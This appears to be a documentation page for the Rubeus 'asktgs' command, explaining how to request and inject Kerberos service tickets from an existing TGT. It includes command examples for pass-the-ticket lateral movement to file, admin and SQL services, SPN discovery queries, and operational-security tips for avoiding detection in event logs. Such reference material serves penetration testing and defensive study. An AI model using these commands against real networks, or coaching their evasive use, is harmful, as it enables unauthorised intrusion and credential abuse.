Skip to main content

Overview

Request service tickets (TGS) for specific services using an existing Ticket Granting Ticket (TGT). This command enables access to specific services and is essential for lateral movement and service access in Kerberos environments.

Syntax

Rubeus.exe asktgs /ticket:TGT /service:SPN [options]

Required Parameters

ticket
string
required
Base64-encoded TGT or path to .kirbi file
service
string
required
Target service SPN(s) - comma-separated for multiple services

Optional Parameters

dc
string
Domain controller to target
outfile
string
Save service ticket to file
ptt
boolean
Pass-the-ticket (inject service ticket)
enterprise
boolean
Use enterprise principal format
u2u
boolean
Request User-to-User authentication ticket
enctype
string
Request specific encryption type (DES|RC4|AES128|AES256)

Examples

# Request CIFS ticket for file access
Rubeus.exe asktgs /ticket:doIFuj... /service:cifs/fileserver.corp.local /ptt

# Request HTTP ticket for web service
Rubeus.exe asktgs /ticket:doIFuj... /service:http/webserver.corp.local /ptt

# Request multiple service tickets
Rubeus.exe asktgs /ticket:doIFuj... /service:cifs/server1.corp.local,http/server2.corp.local

Service Principal Names (SPNs)

File and Print Services:
  • cifs/server.domain.com - SMB/CIFS file sharing
  • nfs/server.domain.com - Network File System
Web Services:
  • http/webserver.domain.com - HTTP web services
  • https/webserver.domain.com - HTTPS secure web
Administrative Services:
  • host/computer.domain.com - General host services
  • rpcss/server.domain.com - RPC endpoint mapper
Directory Services:
  • ldap/dc.domain.com - LDAP directory access
  • gc/dc.domain.com - Global catalog access
SQL Server:
  • MSSQLSvc/server.domain.com:1433 - Default instance
  • MSSQLSvc/server.domain.com:NAMED - Named instance
Oracle:
  • oracle/server.domain.com - Oracle database
Other Databases:
  • postgres/server.domain.com - PostgreSQL
  • mysql/server.domain.com - MySQL

Advanced Options

Standard vs Enterprise:
# Standard format
/service:cifs/server.corp.local

# Enterprise format (useful for cross-domain)
/service:user@domain.com /enterprise
Benefits of Enterprise Format:
  • Works across domain trusts
  • Simplifies cross-domain access
  • Handles complex forest scenarios
U2U Protocol:
/u2u /service:krbtgt/domain.com
Use Cases:
  • Bypass service key requirements
  • Access services without knowing service account password
  • Specialized authentication scenarios

Encryption Type Handling

Automatic Selection:
  • Client and server negotiate highest supported encryption
  • Typically results in AES256 in modern environments
  • Falls back to RC4 for legacy compatibility
Explicit Type Request:
# Request specific encryption
/enctype:AES256  # Preferred for OPSEC
/enctype:RC4     # Compatible but detectable
/enctype:AES128  # Balance of security and performance

Lateral Movement Applications

SMB/CIFS Access:
# Get CIFS ticket and access files
Rubeus.exe asktgs /ticket:TGT /service:cifs/fileserver.corp.local /ptt

# Then access via UNC path
dir \\fileserver.corp.local\share
Remote Administration:
# Get HOST ticket for admin access
Rubeus.exe asktgs /ticket:TGT /service:host/target.corp.local /ptt

# Use for WMI, services, registry, etc.
wmic /node:target.corp.local process list
SQL Server Access:
# Get SQL Server ticket
Rubeus.exe asktgs /ticket:TGT /service:MSSQLSvc/sql01.corp.local:1433 /ptt

# Connect to database
sqlcmd -S sql01.corp.local -E

Service Discovery

PowerShell Discovery:
# Find SPNs for target
setspn -L target.corp.local

# Search for service types
Get-ADUser -Filter {ServicePrincipalName -like "*SQL*"}
LDAP Queries:
# Using ldapsearch
ldapsearch -h dc.corp.local -b "dc=corp,dc=local" "serviceprincipalname=*"

Pass-the-Ticket Integration

Using /ptt flag:
# Automatically inject service ticket
Rubeus.exe asktgs /ticket:TGT /service:cifs/server.corp.local /ptt
Manual Injection:
# Get ticket to file, then inject separately
Rubeus.exe asktgs /ticket:TGT /service:cifs/server.corp.local /outfile:service.kirbi
Rubeus.exe ptt /ticket:service.kirbi

Error Handling

Service Not Found:
KDC_ERR_S_PRINCIPAL_UNKNOWN
  • SPN doesn’t exist or is misspelled
  • Service not registered in Active Directory
Access Denied:
KDC_ERR_BADOPTION
  • TGT doesn’t have required privileges
  • Service account restrictions
Encryption Issues:
KDC_ERR_ETYPE_NOSUPP
  • Requested encryption type not supported
  • Encryption downgrade policies

Operational Security

Event Logs:
  • Event ID 4769 (Service ticket requested)
  • Multiple rapid service ticket requests
  • Unusual service access patterns
Behavioral Indicators:
  • Service tickets without subsequent service access
  • Bulk SPN enumeration
  • Cross-domain service requests
Targeted Requests:
  • Request only needed service tickets
  • Space out requests over time
  • Use legitimate service patterns
Encryption Selection:
  • Prefer AES encryption when possible
  • Match environment encryption standards
  • Avoid RC4 in modern environments
  • asktgt - Request TGT for service ticket requests
  • ptt - Pass service tickets to current session
  • s4u - Use service tickets for delegation abuse
  • describe - Analyze service ticket contents